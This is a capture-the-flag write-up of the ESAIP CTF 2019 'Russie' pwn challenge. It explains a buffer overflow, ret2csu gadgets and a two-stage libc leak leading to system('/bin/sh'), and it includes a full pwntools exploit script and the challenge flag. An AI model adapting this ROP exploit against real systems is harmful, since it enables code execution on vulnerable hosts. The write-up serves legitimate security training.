10820
ESAIP CTF 2019 - Russie (pwn)
I and my CTF team Hackatsuki recently participated to the ESAIP CTF 2019 which lasted over 10 hours. The challenges weren't really diversified but the pwn was pretty nice. We reached the 4th place in the scoreboard !
This CTF used the Facebook CTF platform, fbctf which UI is pretty awesome but has some bugs. Each challenge was bound to a country, for example Belarus, Chile, Russia, America, Canda was pwn challenges. Canada was the only challenge I could not solve but Mini'Kube dit it insanely and Russie was the last one in pwn series with 455 points.
You should ROP
The binary include only the main function which is pretty short, only write, setvbuf and read are called and so will be in the PLT. About the mitigations the NX bit, ASLR and RELRO are enabled.
The vulnerability resides in the read function which will read 0x15E (350) bytes from stdin and write it in the ~100 bytes buffer. It's like we have to do some ROP now !
int __cdecl main(int argc, const char **argv, const char **envp) { char buf; // [rsp+0h] [rbp-70h] write(1, "Hello ROP\n", 0xAuLL); setvbuf(stdin, 0LL, 2, 0LL); setvbuf(_bss_start, 0LL, 2, 0LL); return read(0, &buf, 0x15EuLL); }
gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : FULL gdb-peda$ info func @plt All functions matching regular expression "@plt": Non-debugging symbols: 0x0000000000401030 write@plt 0x0000000000401040 read@plt 0x0000000000401050 setvbuf@plt
Sadly the binary is compiled for dynamic linking, the amount of gadget will be very restricted.
__LIBC_CSU_INIT
But hopefully there are gadgets always presents in binary in the __libc_csu_init function. The __libc_csu_init is defined as attached code because no matter what you wrote, the binary will always hold this function.
For intel x64 binary (System V AMD64 ABI) functions, parameters are passed the following way
| 1 | RDI |
| 2 | RSI |
| 3 | RDX |
| 4 | RCX |
| 5 | R8 |
| 6 | R9 |
| n | STACK |
In order to make functions call via our ROP we need to control at least RDI, RSI, RDX because the only availables functions, write and read have 3 parameters.
- the gadget at 0x0000000000401212 allows us to control : rbx, rbp, r12, r13, r14, r15
- the gadget at 0x00000000004011f8 allows us to control rdx, rsi and edi
- the gadget at 0x0000000000401201 lets us call [r12 + rbx * 8] (we control both of them thanks to the first gadget)
We do not control the 4 highest bytes of RDI but no worries therere is a gadget in the binary
gdb-peda$ x/2i 0x000000000040121b 0x40121b <__libc_csu_init+91>: pop rdi 0x40121c <__libc_csu_init+92>: ret gdb-peda$
As you see theses gadgets let us call whatever we want and as many time as we want because right after the call, if rbx == rbp, we will pop again our arguments and ret the gadget we want !
Payloading
My first idea was :
- write(stdout, read_got, 8) ; leaking read address in order to get libc base address
- read(1, bss, 8) ; to write system address somewhere we control like bss
- and then call [bss] via the ret2csu.
But there is something much easier :
- write(stdout, read_got, 8) ; leaking read address in order to get libc base address
- ret2main in order to send another payload
- ret2libc with system address previously leaked and calculated
Here the schema of the scenario
STAGE 1 +-------------------------------+ | A * 120 | +-------------------------------+ | pop_all | <----------+ MAIN SAVED EIP +-------------------------------+ | 0 ; rbx | <----------+ pop rbx +-------------------------------+ | 1 ; rbp | <----------+ pop rbp +-------------------------------+ | write_got | <----------+ pop r12 +-------------------------------+ | 1 ; args 1 | <----------+ pop r13 +-------------------------------+ | read_got; args 2 | <----------+ pop r14 +-------------------------------+ | 8 ; args 3 | <----------+ pop r15 +-------------------------------+ | mov rdx,r15 | | mov rsi,r14 | | mov edi,r13d | <----------+ ret | call [r12 + rbx * 8] | | [...] | | pop ret | +-------------------------------+ | NOPE * 7 | <----------+ after call, there is add rsp, 0x8 and pop * 6 +-------------------------------+ | main_addr | <----------+ ret +-------------------------------+
This will leak the read address and go back to main to execute again the program, the stage 2 will trigger the ret2libc
STAGE 2 +-------------------------------+ | A * 120 | +-------------------------------+ | pop_rdi | <---------+ MAIN SAVED EIP +-------------------------------+ | /bin/sh addr | +-------------------------------+ | system addr | +-------------------------------+
Here the full exploit
from pwn import * from struct import unpack local = False p = remote("172.16.128.39", 31336) p.readuntil("ROP") ############################## NOPE = p64(0x4143414241434142) main = 0x401142 pop_rdi = 0x000000000040121b pop_all = 0x0000000000401212 # rbx rbp 12 13 14 15 mov_rdx_r15_rsi_r14 = 0x00000000004011f8 write_got = 0x403fd8 read_got = 0x403fe0 bss = 0x404018 if local: read_offset = 0x00000000000db900 system_offset = 0x000000000003f480 bin_sh_offset = 0x161c19 else: read_offset = 0x00000000000e4680 system_offset = 0x0000000000041af0 bin_sh_offset = 0x17699e # write = 1, ptr src, size # read = 0, ptr dest, size #[ STAGE 1]########################### payload = "A" * 120 ### write(1, read, 8) payload += p64(pop_all) payload += p64(0) # rbx payload += p64(1) # rbp : must be < rbx payload += p64(write_got) #r12 # call payload += p64(0x1) # arg 1 payload += p64(read_got) # arg 2 payload += p64(0x8) # arg3 payload += p64(mov_rdx_r15_rsi_r14) payload += NOPE * 7 payload += p64(main) # adresse de la suite de la rop p.sendline(payload) #[ LEAK ########################### p.read() leak = p.read()[:8] libc_addr = unpack("<Q", leak)[0] - read_offset system_addr = libc_addr + system_offset bin_sh = libc_addr + bin_sh_offset exit = libc_addr + 0x0000000000035980 log.info("libc @ " + hex(libc_addr)) #[ STAGE 2]########################### stage2 = "A" * 120 ### system(sh) stage2 += p64(pop_rdi) stage2 += p64(bin_sh) stage2 += p64(system_addr) p.sendline(stage2) p.interactive() #ectf19{H_a_cker_detect_e_d_0011010}